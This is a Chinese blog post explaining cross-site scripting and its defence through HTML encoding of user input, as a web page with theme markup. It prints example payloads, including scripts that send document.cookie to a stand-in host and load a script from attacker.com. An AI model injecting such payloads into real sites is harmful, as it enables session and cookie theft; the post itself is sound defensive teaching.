<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="网络安全," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta property="og:type" content="article">
<meta property="og:title" content="注意安全！XSS 和 XSRF">
<meta property="og:url" content="http://alex2wong.github.io/2016/12/02/1注意安全！XSS 和 XSRF/index.html">
<meta property="og:site_name" content="Space Shuttle">
<meta property="og:image" content="http://img.blog.csdn.net/20161126164628074">
<meta property="og:image" content="http://img.blog.csdn.net/20161126165433702">
<meta property="og:updated_time" content="2018-03-06T10:29:45.255Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="注意安全！XSS 和 XSRF">
<meta name="twitter:image" content="http://img.blog.csdn.net/20161126164628074">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: false,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://alex2wong.github.io/2016/12/02/1注意安全！XSS 和 XSRF/"/>





  <title> 注意安全！XSS 和 XSRF | Space Shuttle </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Space Shuttle</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="http://alex2wong.github.io/2016/12/02/1注意安全！XSS 和 XSRF/">

  <span style="display:none" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="name" content="alex huang">
    <meta itemprop="description" content="">
    <meta itemprop="image" content="/images/avatar.gif">
  </span>

  <span style="display:none" itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Space Shuttle">
    <span style="display:none" itemprop="logo" itemscope itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="Space Shuttle" src="">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                注意安全！XSS 和 XSRF
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2016-12-02T13:14:00+08:00">
                2016-12-02
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
              <span class="post-meta-divider">|</span>
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/网络安全/" itemprop="url" rel="index">
                    <span itemprop="name">网络安全</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/网络安全/前端/" itemprop="url" rel="index">
                    <span itemprop="name">前端</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          

          
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/lightgallery.js/1.0.1/css/lightgallery.min.css"><div class=".article-gallery" <p="">最近在看一些关于网络安全的问题，跟前端相关的包括且不局限于<strong>xss和xsrf </strong>了，那么<strong>一休哥</strong>就结合最近的学习谈一些粗浅的了解和实验。（(^o^)/，我是一个喜欢做实验的家伙）<p></p>
<h3 id="XSS（Cross-site-script）攻击！"><a href="#XSS（Cross-site-script）攻击！" class="headerlink" title="XSS（Cross site script）攻击！"></a>XSS（Cross site script）攻击！</h3><hr>

<p>XSS 意思就是跨站脚本。这里面也涉及到跨域的问题，特别是在后面谈到XSRF防御的时候。简单来说XSS就是来自外部输入的脚本被注入到了受害网站（~ o ~, 被公鸡了），如果该网站没有对临时加入DOM 结构的 JS 脚本进行过滤，那么这段脚本可能被之后访问该网站的用户浏览器执行。 </p>
<p>举个栗子：</p>
<p>假如 某网站有评论功能且没有针对XSS 的过滤，那么一休哥在@英俊熊的某文章下评论了一下内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;script&gt;alert(&quot;你查看了小熊哥的博文，赔钱！！打赏！！不打赏不准走！&quot;)&lt;/script&gt;</div></pre></td></tr></table></figure>
<p>那么这段字符串POST给了稚嫩的服务器，没有Encode，啥都没做。原封不动加入了原本的HTML页面，那么当其他用户查看该文章的时候浏览器就会<strong>自动执行DOM Tree中的这句 JS 语句</strong>，弹出来 吓人+_+…</p>
<p>这还不算啥，顶多就是烦人。但如果评论里面写的是：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;script&gt;window.open(www.yixiuge.com?content=document.cookie);&lt;/script&gt;</div></pre></td></tr></table></figure></p>
<p>我擦。。当你访问小熊哥博文时，你在当前域名下的cookie被一休哥设置的什么鬼网站给get到了。。www.yixiuge.com 这个网站的后台程序会拿到你的cookie，然后借此cookie登陆你的简书，乱发段子。<br>当然一般来说服务器端返回的httpResponse中setCookie字段中会设置httpOnly，也就是脚本无法获取cookie，只有<strong>httpRequest会自带cookie</strong>。我们这里只是做一个简单示例</p>
<p>其实，有个非常棒的图展示了整个XSS攻击的过程：<br><a href="http://img.blog.csdn.net/20161126164628074" title="这里写图片描述" class="gallery-item" target="_blank" rel="external"><img src="http://img.blog.csdn.net/20161126164628074" alt="这里写图片描述"></a></p>
<center>HOW XSS WORKS</center>

<p>所以作为一个合格的WebApp，不能相信任何用户输入内容， 更不能未加处理就直接Print到HTML DOM 结构里。当今主流的一些前端框架（Angular 2.1，都已经2.1了。。。）都实现了对XSS的防御，结合服务器端程序更是可以防御XSRF（Cross site request forgery 跨站伪造请求）</p>
<h3 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h3><p><hr><br>那么到底如何防御这种简单的<strong>脚本攻击</strong>呢？</p>
<p>我简单说一下，因为我也没有完全实现过HTML Encoder什么鬼的，只是做了一些实验来验证。核心思想就是：<strong>不相信用户输入</strong>，对任何输入都进行过滤，如果非要显示，那么Encode之后再显示在HTML中。</p>
<p>除了<strong>script</strong>这样的标签在DOM结构中会自动执行，还有哪些？？</p>
<p>对的：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&lt;img src=&quot;attacker.com/porn.js&quot; /&gt; </div><div class="line">&lt;a href=&quot;www.yixiuge.com?content=document.cookie&quot;&gt;&lt;/a&gt; </div><div class="line">// 等等</div></pre></td></tr></table></figure></p>
<p>以上都能实现浏览器发送GET请求外部脚本，或者向非法网站发送POST请求。可能会修改你正在访问的网站的密码。。很危险，所以在将用户评论POST 到服务器之前就可以做<strong>HTML Encode</strong> 操作（或者叫做Escape操作），原理就是把 &lt; , &gt; , “ 等等不安全字符换成无害字符，这样浏览器就不会把这段字符串作为代码来执行了。</p>
<p>举个栗子：</p>
<p>用户输入评论是：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;script&gt;alert(&quot; peiqian!&quot;)&lt;/script&gt;</div></pre></td></tr></table></figure></p>
<p>无害处理后字符串是：</p>
<p><a href="http://img.blog.csdn.net/20161126165433702" title="这里写图片描述" class="gallery-item" target="_blank" rel="external"><img src="http://img.blog.csdn.net/20161126165433702" alt="这里写图片描述"></a></p>
<p>转换背后的机制是一套特殊符号 和 安全字符的映射表， 而且这个跟浏览器对HTML的渲染机制有关。各大浏览器中的JS引擎碰到script这样的标签，会解析其中的代码，并且执行。但碰到 &amp;lt &amp;gt  这样的字符就不会当做JS 执行，而是作为普通字符串打印。大家可以试试看Encode 前后这个例子在浏览器中的表现。</p>
<p>那么除了大型框架，有木有自动Encode 的工具呢？发现一个，可以用用看。附上链接：<a href="https://github.com/mathiasbynens/he" target="_blank" rel="external">HTML entities</a>。 好吧，这次说了XSS，下一篇再说一下XSRF的危害和防御机制。</p>
<p>参考文章：<br><a href="http://www.acunetix.com/websitesecurity/cross-site-scripting" target="_blank" rel="external">cross-site-scripting</a></p>
<p><a href="http://excess-xss.com/" target="_blank" rel="external">全面学习XSS</a></p>
</div><script src="https://cdn.jsdelivr.net/lightgallery.js/1.0.1/js/lightgallery.min.js"></script><script src="/lib/lg-thumbnail.js"></script><script src="/lib/lg-pager.js"></script><script>if (typeof lightGallery !== 'undefined') {
        var options = {
            selector: '.gallery-item'
        };
        lightGallery(document.getElementsByClassName('.article-gallery')[0], options);
        }</script>
      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>


    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/网络安全/" rel="tag"># 网络安全</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/11/29/hello-world/" rel="next" title="Hello World">
                <i class="fa fa-chevron-left"></i> Hello World
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/12/04/2注意安全（2）！XSRF跨站伪造请求/" rel="prev" title="注意安全（2）！XSRF跨站伪造请求">
                注意安全（2）！XSRF跨站伪造请求 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="alex huang" />
          <p class="site-author-name" itemprop="name">alex huang</p>
          <p class="site-description motion-element" itemprop="description">blog of Alex2wong, love visulization, coding, photography</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">10</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">14</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              
                <span class="site-state-item-count">12</span>
                <span class="site-state-item-name">标签</span>
              
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/alex2wong" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/Alex_UndefinedO" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS（Cross-site-script）攻击！"><span class="nav-number">1.</span> <span class="nav-text">XSS（Cross site script）攻击！</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#防御"><span class="nav-number">2.</span> <span class="nav-text">防御</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">alex huang</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	




  
  

  

  

  

  


</body>
</html>
